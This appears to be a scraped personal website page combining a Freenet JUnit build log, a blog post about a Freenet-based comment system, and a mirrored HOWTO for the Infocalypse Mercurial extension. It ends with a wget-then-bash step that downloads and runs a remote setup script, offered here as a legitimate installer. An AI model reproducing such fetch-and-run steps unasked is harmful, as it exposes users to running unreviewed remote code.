    [junit] Testsuite: freenet.support.io.TempBucketFactoryRAFPlaintextTest
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,158 sec
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,158 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testBucketToRAFFreeBucketWhileArray took 0,232 sec
    [junit] Testcase: testBucketToRAFWhileArray took 0,355 sec
    [junit] Testcase: testBucketToRAFFreeWhileFileMigrateFirst took 0,066 sec
    [junit] Testcase: testBucketToRAFCallTwiceFile took 0,008 sec
    [junit] Testcase: testArrayMigration took 0,231 sec
    [junit] Testcase: testBucketToRAFCallTwiceArray took 0,009 sec
    [junit] Testcase: testBucketToRAFFreeWhileFileFreeRAF took 0,008 sec
    [junit] Testcase: testBucketToRAFFailure took 0,017 sec
    [junit] Testcase: testBucketToRAFFreeWhileFile took 0,005 sec
    [junit] Testcase: testBucketToRAFWhileFile took 0,07 sec
    [junit] Testcase: testBucketToRAFFreeWhileArray took 0,004 sec
    [junit] Testcase: testArray took 6,389 sec
    [junit] Testcase: testClose took 0,028 sec
    [junit] Testcase: testSize took 0,028 sec
    [junit] Testcase: testFormula took 0,953 sec
    [junit] Testcase: testWriteOverLimit took 0,297 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.support.io.TempBucketTest$TempBucketMigrationTest
    [junit] Testsuite: freenet.support.io.TempBucketTest$TempBucketMigrationTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,863 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,863 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testRamLimitCreate took 1,367 sec
    [junit] Testcase: testWriteExcessLimit took 0,016 sec
    [junit] Testcase: testWriteExcessConversionFactor took 0,005 sec
    [junit] Testcase: testBigConversionWhileReading took 0,022 sec
    [junit] Testcase: testConversionWhileReading took 0,002 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.support.io.TempBucketTest
    [junit] Testsuite: freenet.support.io.TempBucketTest
    [junit] Tests run: 35, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,656 sec
    [junit] Tests run: 35, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,656 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testReadExcess took 0,036 sec
    [junit] Testcase: testReuse took 0 sec
    [junit] Testcase: testReadEmpty took 0,001 sec
    [junit] Testcase: testReadWrite took 0,019 sec
    [junit] Testcase: testLargeData took 0,188 sec
    [junit] Testcase: testNegative took 0,001 sec
    [junit] Testcase: testReadExcess took 0 sec
    [junit] Testcase: testReuse took 0,001 sec
    [junit] Testcase: testReadEmpty took 0 sec
    [junit] Testcase: testReadWrite took 0,001 sec
    [junit] Testcase: testLargeData took 0,018 sec
    [junit] Testcase: testNegative took 0 sec
    [junit] Testcase: testReadExcess took 0,001 sec
    [junit] Testcase: testReuse took 0 sec
    [junit] Testcase: testReadEmpty took 0 sec
    [junit] Testcase: testReadWrite took 0,001 sec
    [junit] Testcase: testLargeData took 0,035 sec
    [junit] Testcase: testNegative took 0,001 sec
    [junit] Testcase: testReadExcess took 0,001 sec
    [junit] Testcase: testReuse took 0 sec
    [junit] Testcase: testReadEmpty took 0,001 sec
    [junit] Testcase: testReadWrite took 0,001 sec
    [junit] Testcase: testLargeData took 1,652 sec
    [junit] Testcase: testNegative took 0,001 sec
    [junit] Testcase: testReadExcess took 0,001 sec
    [junit] Testcase: testReuse took 0,001 sec
    [junit] Testcase: testReadEmpty took 0,001 sec
    [junit] Testcase: testReadWrite took 0,001 sec
    [junit] Testcase: testLargeData took 0,155 sec
    [junit] Testcase: testNegative took 0 sec
    [junit] Testcase: testRamLimitCreate took 0,006 sec
    [junit] Testcase: testWriteExcessLimit took 0,002 sec
    [junit] Testcase: testWriteExcessConversionFactor took 0,003 sec
    [junit] Testcase: testBigConversionWhileReading took 0,01 sec
    [junit] Testcase: testConversionWhileReading took 0,002 sec
    [junit] Running freenet.support.io.TempFileBucketTest
    [junit] Testsuite: freenet.support.io.TempFileBucketTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,812 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,812 sec
    [junit] 
    [junit] Testcase: testReadExcess took 0,164 sec
    [junit] Testcase: testReuse took 0,022 sec
    [junit] Testcase: testReadEmpty took 0,003 sec
    [junit] Testcase: testReadWrite took 0,004 sec
    [junit] Testcase: testLargeData took 0,132 sec
    [junit] Testcase: testNegative took 0,003 sec
    [junit] Running freenet.support.math.MersenneTwisterTest
    [junit] Testsuite: freenet.support.math.MersenneTwisterTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] 
    [junit] Testcase: testConsistencySeedFromInteger took 0,094 sec
    [junit] Testcase: testConsistencySeedFromInts took 0,006 sec
    [junit] Testcase: testConsistencySeedFromLong took 0,005 sec
    [junit] Testcase: testConsistencySeedFromBytes took 0,07 sec
    [junit] Testcase: testBytesToInts took 0,001 sec
    [junit] Running net.i2p.util.NativeBigIntegerTest
    [junit] Testsuite: net.i2p.util.NativeBigIntegerTest
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi2156358229084298660lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6,367 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6,367 sec
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testModPow took 2,344 sec
    [junit] Testcase: testDoubleValue took 3,541 sec

package-only:
      [jar] Building jar: /home/arne/fred-work/dist/freenet.jar

package:

BUILD SUCCESSFUL
Total time: 27 minutes 19 seconds

(colorized with antlog-mode, a quickly whipped up emacs mode for highlighting and navigating the output from ant)

I now have a spam-resistant, decentralized comment system via Freenet

Note (2017): Due to changes in cross-origin requests, babcom is currently broken. I want to fix it, but can’t do it right now. Sorry for that.

In the last years, spam became worse and worse. The more my site grew, the more time I had to spend deleting blatant advertisements. Even captchas did not help anymore: Either they were so hard that I myself needed 3 tries on average to get through, or I got hundreds of spam messages per day. A few years ago, I caved in and disabled comments. The alternative would have been to turn my Website into a mere PR-outlet of Facebook, twitter or one of the commenting platforms out there.

But this all changed now. I finally have decentralized, spam-resistant comments using babcom with Freenet as backend!

» babcom: decentralized, spam-resistant comments! «

The comment-system builds on the decentral, spam-resistant social features of the Freenet Project, one of the old cypherpunk creations which started in 2000 with the goal to provide true Freedom of the Press in the Internet and has been evolving ever since. It’s an irony that nowadays spam became a vehicle to push people into censorship-enabling platforms, to use up their limited free time or to drown their words in a pile of dung, so other people cannot find them.

If you do not run Freenet now, this screenshot shows how the comment-system looks for me:

Babcom Screenshot

And for me this is a huge relief: I can finally get comments to my articles again without having to sell my conscience or waste most of my time deleting advertisements.

If that sounds interesting, head over to babcom and check if it suits you!

And if you like it, please Flattr babcom and Flattr Sone!

Infocalypse - Make your code survive the information apocalypse

Anonymous DVCS in the Darknet.

Real Life Infocalypse
easy setup of infocalypse (script)
Freenet Development over Freenet

Update 2024: Infocalypse is still recovering from Python 3 breakage. Most of it works again, but there may be rough edges left. Contributions to fix these are very welcome: hg.sr.ht/~arnebab/infocalypse or github.com/hyphanet/infocalypse.

This is a mirror of the documentation of the infocalypse extension for Mercurial written by djk - published here with his permission. It is licensed solely under the GPLv2 or later. The text is long. For concise information, use the second Link above (Freenet Development over Freenet).

Introduction

The Infocalypse 2.0 hg extension is an extension for Mercurial that allows you to create, publish and maintain incrementally updateable repositories in Freenet.

Your code is then hosted decentrally and anonymously, making it just as censorship-resistant as all other content in Freenet.

It works better than the other DVCS currently available for Freenet.

Most of the information you will find in this document can also be found in the extension's online help. i.e.:

hg help infocalypse

HOWTO: Infocalypse 2.0 hg extension


updated: 20090927

Note: Contains Freenet only links

Table of Contents


Requirements

The extension has the following dependencies:

  • Freenet
    You can more information on Freenet here:

    http://freenetproject.org/ [HTTP Link!]

  • Python
    I test on Python 2.5.4 and 2.6.1. Any 2.5.x or later version should work. Earlier versions may work.

    You probably won't have to worry about installing Python. It's included in the Windows binary Mercurial distributions and most *nix flavor OS's should have a reasonably up to date version of Python installed.

  • Mercurial
    You can find more information on Mercurial here:

    http://mercurial-scm.org/ [HTTP Link!]

    Version 1.0.2 won't work.

    I use version 1.2.1 (x86 Gentoo) on a daily basis. Later versions should work.

    I've smoke tested 1.1.2 (on Ubuntu Jaunty Jackalope) and 1.3 (on Widows XP) without finding any problems.

  • FMS
    Installation of the Freenet Messaging System (FMS) is optional but
    highly recommended. The hg fn-fmsread and hg fn-fmsnotify commands won't work without FMS. Without fn-fmsread it is extremely difficult to reliably detect repository updates.

    The official FMS freesite is here:

    USK@0npnMrqZNKRCRoGojZV93UNHCMN-6UU3rRSAmP6jNLE,~BG-edFtdCC1cSH4O3BWdeIYa8Sw5DfyrSV-TKdO5ec,AQACAAE/fms/106/
    
    

[TOC]


Installation

You checked the requirements and understandthe risks right?

Here are step-by-step instructions on how to install the extension.

  • Download the bootstrap hg bundle:
    CHK@S~kAIr~UlpPu7mHNTQV0VlpZk-f~z0a71f7DlyPS0Do,IB-B5Hd7WePtvQuzaUGrVrozN8ibCaZBw3bQr2FvP5Y,AAIC--8/infocalypse2_1723a8de6e7c.hg
        

    You'll get a Potentially Dangerous Content warning from fproxy because the mime type isn't set. Choose 'Click here to force your browser to download the file to disk.'.

    I'll refer to the directory that you saved the bundle file to as DOWNLOAD_DIR.

  • Create an empty directory where you want to install the extension.
    I'll refer to that directory as INSTALL_DIR in the
    rest of these instructions.

  • Create an empty hg repository there. i.e.:
    cd INSTALL_DIR
    hg init
    
  • Unbundle the bootstrap bundle into the new repository. i.e:
    hg pull DOWNLOAD_DIR/infocalypse2_1723a8de6e7c.hg
    hg update
    
  • Edit the '[extensions]' section of your .hgrc/mercurial.ini
    file to point to the infocalypse directory in the unbundled source.

    # .hgrc/mercurial.ini snippet
    [extensions]
    infocalypse = INSTALL_DIR/infocalypse
    

    where INSTALL_DIR is the directory you unbundled into.

    If you don't known where to find/create your .hgrc/mercurial.ini file this link may be useful:

    http://www.selenic.com/mercurial/hgrc.5.html [HTTP Link!]

  • Run fn-setup to create the config file and temp dir. i.e.
    hg fn-setup
       

    If you run your Freenet node on another machine or on a non-standard port you'll need to use the --fcphost and/or --fcpport parameters to set the FCP host and port respectively.

    By default fn-setup will write the configuration file for the extension (.infocalype on *nix, infocalypse.ini on Windows) into your home directory and also create a temp directory called infocalypse_tmp there.

    You can change the location of the temp directory by using the --tmpdir argument.

    If you want to put the config file in a different location set the cfg_file option in the [infocalypse] section of your .hgrc/mercurial.ini file before running fn-setup.

    Example .hgrc entry:
    # Snip, from .hgrc
    [infocalypse]
    cfg_file = /mnt/usbkey/s3kr1t/infocalypse.cfg
  • Edit the fms_id and possibly fms_host/fms_port information in the.infocalyse/infocalypse.ini file. i.e.:

    # Example .infocalypse snippet
    fms_id = YOUR_FMS_ID
    
    fms_host = 127.0.0.1
    fms_port = 1119
    

    where YOUR_FMS_ID is the part of your fms id before the '@' sign.

    If you run FMS with the default settings on the same machine you are running
    Mercurial on you probably won't need to adjust the fcp_host or fcp_port.

    You can skip this step if you're not running fms.

  • Read the latest know version of the extension's repository USK index from FMS.
    hg fn-fmsread -v
    

    You can skip this step if you're not running fms.

  • Pull the latest changes to the extension from Freenet for the first time. Don't skip this step! i.e.:
    hg fn-pull --aggressive --debug --uri USK@kRM~jJVREwnN2qnA8R0Vt8HmpfRzBZ0j4rHC2cQ-0hw,2xcoQVdQLyqfTpF2DpkdUIbHFCeL4W~2X1phUYymnhM,AQACAAE/infocalypse.hgext.R1/41
    hg update
    

    You may have trouble finding the top key if you're not using fn-fmsread. Just keep retrying. If you know the index has increased, use the new index in the URI.

    After the first pull, you can update without the URI.

[TOC]


Updating

This extension is under active development. You should periodically update to get the latest bug fixes and new features.

Once you've installed the extension and pulled it for the first time, you can get updates by cd'ing into the initial INSTALL_DIRand typing:

hg fn-fmsread -vhg fn-pull --aggressive hg update

If you're not running FMS you can skip the fn-fmsread step. You may have trouble getting the top key. Just keep retrying.

If you're having trouble updating and you know the index has increased, use the full URI with the new index as above.

[TOC]


Background

Here's background information that's useful when using the extension.See the
Infocalypse 2.0 hg extension page on my freesite for a more detailed description of how the extension works.

Repositories are collections of hg bundle files

An Infocalypse repository is just a collection of hg bundle files which have been inserted into Freenet as CHKs and some metadata describing how to pull the bundles to reconstruct the repository that they represent. When you 'push' to an infocalypse repository a new bundleCHK is inserted with the changes since the last update. When you 'pull', only the CHKs for bundles for changesets not already in the local repository need to be fetched.

Repository USKs

The latest version of the repository's metadata is stored on a Freenet Updateable Subspace Key (USK) as a small binary file.

You'll notice that repository USKs end with a number without a trailing '/'. This is an important distinction. A repository USK is not a freesite. If you try to view one with fproxy you'll just get a 'Potentially Dangerous Content' warning. This is harmless, and ugly but unavoidable at the current time because of limitation in fproxy/FCP.

Repository top key redundancy

Repository USKs that end in *.R1/<number> are inserted redundantly, with a second USK insert done on *.R0/<number>. Top key redundancy makes it easier for other people to fetch your repository.

Inserting to a redundant repository USK makes the inserter more vulnerable to
correlation attacks. Don't use '.R1' USKs if you're worried about this.

Repository Hashes

Repository USKs can be long and cumbersome. A repository hash is the first 12 bytes of the Sha1 hash of the zero index version of a repository USK. e.g.:

SHA1( USK@kRM~jJVREwnN2qnA8R0Vt8HmpfRzBZ0j4rHC2cQ-0hw,2xcoQVdQLyqfTpF2DpkdUIbHFCeL4W~2X1phUYymnhM,AQACAAE/infocalypse.hgext.R1/0 )
  == 'be68e8feccdd'

You can get the repository hash for a repository USK using:

hg fn-info

from a directory the repository USK has been fn-pull'd into.

You can get the hashes of repositories that other people have announced via fms with:

hg fn-fmsread --listall

Repository hashes are used in the fms update trust map.

The default private key

When you run fn-setup, it creates a default SSK private key, which it stores inthe default_private_key parameter in your .infocalypse/infocalypse.ini file.

You can edit the config file to substitute any valid SSK private key you want.

If you specify an Insert URI without the key part for an infocalypse command the default private key is filled in for you. i.e

hg fn-create --uri USK@/test.R1/0

Inserts the local hg repository into a new USK in Freenet, using the private key in your config file.

USK <--> Directory mappings

The extension's commands 'remember' the insert and request repository USKs they were last run with when run again from the same directory.

This makes it unnecessary to retype cumbersome repository USK values once a repository has been successfully pulled or pushed from a directory.

Aggressive top key searching

fn-pull and fn-push have an --aggressive command line argument which causes them to search harder for the latest request URI.

This can be slow, especially if the USK index is much lower than the latest index in Freenet.

You will need to use it if you're not using FMS update notifications.

[TOC]


Basic Usage

Here are examples of basic commands.

Generating a new private key

You can generate an new private key with:

hg fn-genkey

This has no effect on the stored default private key.

Make sure to change the 'SSK' in the InsertURI to 'USK' when supplying the insert URI on the command line.

Creating a new repository

hg fn-create --uri USK@/test.R1/0

Inserts the local hg repository into a new USK in Freenet, using the privatekey in your config file. You can use a full insert URI value if you want.

If you see an "update -- Bundle too big to salt!" warning message when you run this command you should consider running
fn-reinsert --level 4.

Pushing to a repository

hg fn-push --uri USK@/test.R1/0

Pushes incremental changes from the local directory into an existing Infocalypse repository.

The <keypart>/test.R1/0 repository must already exist in Freenet.In the example above the default private key is used. You could have specified a full Insert URI. The URI must end in a number but the value doesn't matter because fn-push searches for the latest unused index.

You can ommit the --uri argument whenyou run from the same directory the fn-create (or a previous fn-push)was run from.

Pulling from a repository

hg fn-pull --uri <request uri>

pulls from an Infocalypse repository in Freenet intothe local repository.
Here's an example with a fully specified uri.

You can ommit the --uri argument whenyou run from the same directory a previous fn-pull was successfully run from.

For maximum reliability use the --aggressive argument.

[TOC]


Using FMS to send and receive update notifications

The extension can send and receive repository update notifications via FMS. It is highly recommended that you
setup this feature.

The update trust map

There's a trust map in the .infocalypse/infocalypse.ini config file which determines which fms ids can update the index values for which repositories. It is purely local and completely separate from the trust values which appear in the FMS web of trust.

The format is:
<number> = <fms_id>|<usk_hash0>|<usk_hash1>| ... |<usk_hashn>

The number value must be unique, but is ignored.

The fms_id values are the full FMS ids that you are trusting to update the repositories with the listed hashes.

The usk_hash* values are repository hashes.

Here's an example trust map config entry:

# Example .infocalypse snippet
[fmsread_trust_map]
1 = test0@adnT6a9yUSEWe5p8J-O1i8rJCDPqccY~dVvAmtMuC9Q|55833b3e6419
0 = djk@isFiaD04zgAgnrEC5XJt1i4IE7AkNPqhBG5bONi6Yks|be68e8feccdd|5582404a9124
2 = test1@SH1BCHw-47oD9~B56SkijxfE35M9XUvqXLX1aYyZNyA|fab7c8bd2fc3

You must update the trust map to enable index updating for repos other than the one this code lives in (be68e8feccdd). You can edit the config file directly if you want.

However, the easiest way to update the trust map is by using the--trust and --untrust options on fn-fmsread.

For example to trust falafel@IxVqeqM0LyYdTmYAf5z49SJZUxr7NtQkOqVYG0hvITwto notify you about changes to the repository with repo hash 2220b02cf7ee,type:

hg fn-fmsread --trust --hash 2220b02cf7ee --fmsid falafel@IxVqeqM0LyYdTmYAf5z49SJZUxr7NtQkOqVYG0hvITw

And to stop trusting that FMS id for updates to 2220b02cf7ee, you would type:

hg fn-fmsread --untrust --hash 2220b02cf7ee --fmsid falafel@IxVqeqM0LyYdTmYAf5z49SJZUxr7NtQkOqVYG0hvITw

To show the trust map type:

hg fn-fmsread --showtrust

Reading other people's notifications

hg fn-fmsread -v

Will read update notifications for all the repos in the trust map and locally cache the new latest index values. If you run with -vit prints a message when updates are available which weren't used because the sender(s) weren't in the trust map.

hg fn-fmsread --list

Displays announced repositories from fms ids that appear inthe trust map.

hg fn-fmsread --listall

Displays all announced repositories including ones from unknown fms ids.

Pulling an announced repository

You can use the --hash option with fn-pull to pull any repository you see in the fn-read --list or fn-read --listall lists.

For example to pull the latest version of the infocalypse extension code, cd to an empty directory and type:

hg inithg fn-pull --hash be68e8feccdd --aggressive

Posting your own notifications

hg fn-fmsnotify -v

Posts an update notification for the current repository to fms.

You MUST set the fms_id value in the config fileto your fms id for this to work.

Use --dryrun to double check before sending the actual fms message.

Use --announce at least once if you want your USK to show up in the fmsread --listall list.

By default notifications are written to and read from the infocalypse.notify fms group.

The read and write groups can be changed by editing the following variables in the config file:

fmsnotify_group = <group>
fmsread_groups = <group0>[|<group1>|...]

fms can have pretty high latency. Be patient. It may take hours (sometimes a day!) for your notification to appear. Don't send lots of redundant notifications.

[TOC]


Reinserting and 'sponsoring' repositories

hg fn-reinsert

will re-insert the bundles for the repository that was last pulled into the directory.

The exact behavior is determined by the level argument.

level:

  • 1 - re-inserts the top key(s)
  • 2 - re-inserts the top keys(s), graphs(s) and the most recent update.
  • 3 - re-inserts the top keys(s), graphs(s) and all keys required to bootstrap the repo.

    This is the default level.

  • 4 - adds redundancy for big (>7Mb) updates.
  • 5 - re-inserts existing redundant big updates.

Levels 1 and 4 require that you have the privatekey for the repository. For other levels, the top key insert is skipped if you don't have the private key.

DO NOT use fn-reinsert if you're concerned about
correlation attacks. The risk is on the order of re-inserting a freesite, but may be worse if you use redundant(i.e. USK@<line noise>/name.R1/0) top keys.

[TOC]


Forking a repository onto a new USK

hg fn-copy --inserturi USK@/name_for_my_copy.R1/0

copies the Infocalypse repository which was fn-pull'd intothe local directory onto a new repository USK under your default private key. You can use a full insert URI if you want.

This only requires copying the top key data (a maximum of 2 SSK inserts).

[TOC]


Sharing private keys

It is possible for multiple people to collaborate anonymously over Freenet by sharing the private key to a single Infocalypse repository.

The FreeFAQ is an example of this technique.

Here are some things to keep in mind when sharing private keys.

  • There is no (explict) key revocation in Freenet

    If you decide to share keys, you should generate a special key on a per repo basis with fn-genkey. There is no way to revoke a private key once it has been shared. This could be mitigated with an ad-hoc convention. e.g. if I find any file named USK@<public_key>/revoked.txt, I stop using the key.
  • Non-atomic top key inserts

    Occasionally, you might end up overwriting someone elses commits because the FCP insert of the repo top key isn't atomic. I think you should be able to merge and re fn-push to resolve this. You can fn-pull a specific version of the repo by specify the full URI including the version number with --uri and including the --nosearch option.
  • All contributors should be in the fn-fmsread trust map

[TOC]


Inserting a freesite

hg fn-putsite --index <n>

inserts a freesite based on the configuration inthe freesite.cfg file in the root of the repository.

Use:

hg fn-putsite --createconfig

to create a basic freesite.cfg file that you can modify. Look at the comments in it for an explanation of the supported parameters.

The default freesite.cfg file inserts using the same private key as the repo and a site name of 'default'. Editing the name is highly recommended.

You can use --key CHK@ to insert a test version of the site to a CHK key before writing to the USK.

Limitations:

  • You MUST have fn-pushed the repo at least once in order to insert using the repo's private key. If you haven't fn-push'd you'll see this error: "You don't have the insert URI for this repo. Supply a private key with --key or fn-push the repo."
  • Inserts all files in the site_dir directory in the freesite.cfg file. Run with --dryrun to make
    sure that you aren't going to insert stuff you don't want too.
  • You must manually specify the USK edition you want to insert on. You will get a collision error
    if you specify an index that was already inserted.
  • Don't use this for big sites. It should be fine for notes on your project. If you have lots of images
    or big binary files use a tool like jSite instead.
  • Don't modify site files while the fn-putsite is running.

[TOC]


Risks

I don't believe that using this extension is significantly more dangerous that using any other piece of Freenet client code, but here is a list of the risks which come to mind:

  • Freenet is beta software
    The authors of Freenet don't pretend to guarantee that it is free of bugs that could that could compromise your anonymity or worse.

    While written in Java, Freenet loads native code via JNI (FEC codecs, bigint stuff, wrapper, etc.) that makes it vulnerable to the same kinds of attacks as any other C/C++ code.

  • FMS == anonymous software
    FMS is published anonymously on Freenet and it is written in C++ with dependencies on large libraries which could contain security defects.

    I personally build FMS from source and run it in a chroot jail.

    Somedude, the author of FMS, seems like a reputable guy and has conducted himself as such for more than a year.

  • correlation attacks
    There is a concern that any system which inserts keys that can be predicted ahead of time could allow an attacker with control over many nodes in the network to eventually find the IP of your node.

    Any system which has this property is vulnerable. e.g. fproxy Freesite insertion,Freetalk, FMS, FLIP. This extension's optional use of
    redundant top keys may make it particularly vulnerable. If you are concerned don't use '.R1' keys.

    Running your node in pure darknet mode with trusted peers may somewhat reduce the risk of correlation attacks.

  • Bugs in my code, Mercurial or Python
    I do my best but no one's perfect.

    There are lots of eyes over the Mercurial and Python source.

[TOC]


Advocacy

Here are some reasons why I think the Infocalypse 2.0 hg extension is better than
pyFreenetHg and
egit-freenet:

  • Incremental

    You only need to insert/retrieve what has actually changed. Changes of up to 32kof compressed deltas can be fetched in as little as one SSK fetch and one CHK fetch.

  • Redundant

    The top level SSK and the CHK with the representation of the repository state are inserted redundantly so there are no 'critical path' keys. Updates of up to ~= 7Mbare inserted redundantly by cloning the splitfile metadata at the cost of a single32k CHK insert.

  • Re-insertable

    Anyone can re-insert all repository data except for the top level SSKs with a simple command (hg fn-reinsert). The repository owner can re-insert the top levelSSKs as well.

  • Automatic rollups

    Older changes are automatically 'rolled up' into large splitfiles, such that the entire repository can almost always be fetched in 4 CHK fetches or less.

  • Fails explictly

    REDFLAG DCI

[TOC]


Source Code

The authoritative repository for the extension's code is hosted in Freenet:

hg inithg fn-fmsread -vhg fn-pull --aggressive --debug --uri USK@kRM~jJVREwnN2qnA8R0Vt8HmpfRzBZ0j4rHC2cQ-0hw,2xcoQVdQLyqfTpF2DpkdUIbHFCeL4W~2X1phUYymnhM,AQACAAE/infocalypse.hgext.R1/41hg update

It is also mirrored on bitbucket.org:

hg clone http://bitbucket.org/dkarbott/infocalypse_hgext/

[TOC]


Fixes and version information

  • hg version: c51dc4b0d282

    Fixed abort: <bundle_file> not found! problem on fn-pull when hg-git plugin was loaded.
  • hg version: 0c5ce9e6b3b4

    Fixed intermittent stall when bootstrapping from an empty repo.
  • hg version: 7f39b20500f0

    Fixed bug that kept fn-pull --hash from updating the initial USK index.
  • hg version: 7b10fa400be1

    Added fn-fmsread --trust and --untrust and fn-pull --hash support.


    fn-pull --hash isn't really usable until 7f39b20500f0
  • hg version: ea6efac8e3f6

    Fixed a bug that was causing the berkwood binary 1.3 Mercurial distribution
    (http://mercurial.berkwood.com/binaries/Mercurial-1.3.exe [HTTP Link!]) not to work.

[TOC]


Freenet-only links

This document is meant to inserted into Freenet.

It contains links (starting with 'CHK@' and 'USK@')to Freenet keys that will only work from within fproxy [HTTP link!].

You can find reasonably up to date version of this document on my freesite:

USK@-bk9znYylSCOEDuSWAvo5m72nUeMxKkDmH3nIqAeI-0,qfu5H3FZsZ-5rfNBY-jQHS5Ke7AT2PtJWd13IrPZjcg,AQACAAE/feral_codewright/15/infocalypse_howto.html

[TOC]


Contact

FMS:
djk@isFiaD04zgAgnrEC5XJt1i4IE7AkNPqhBG5bONi6Yks

I lurk on the freenet and fms boards.

If you really need to you can email me at d kar bott at com cast dot net but I prefer FMS.

freesite:
USK@-bk9znYylSCOEDuSWAvo5m72nUeMxKkDmH3nIqAeI-0,qfu5H3FZsZ-5rfNBY-jQHS5Ke7AT2PtJWd13IrPZjcg,AQACAAE/feral_codewright/15/

[TOC]


Install and setup infocalypse on GNU/Linux (script)

Update (2015-11-27): The script works again with newer Freenet versions.

Update 2024: Infocalypse is still recovering from Python 3 breakage. Most of it works again, but there may be rough edges left. Contributions to fix these are very welcome: hg.sr.ht/~arnebab/infocalypse or github.com/hyphanet/infocalypse.

Install and setup infocalypse on GNU/Linux:

setup_infocalypse_on_linux.sh

Just download and run1 it via

wget http://draketo.de/files/setup_infocalypse_on_linux.sh_.txt
bash setup_infocalypse*

This script needs a running freenet node to work! → Install Freenet

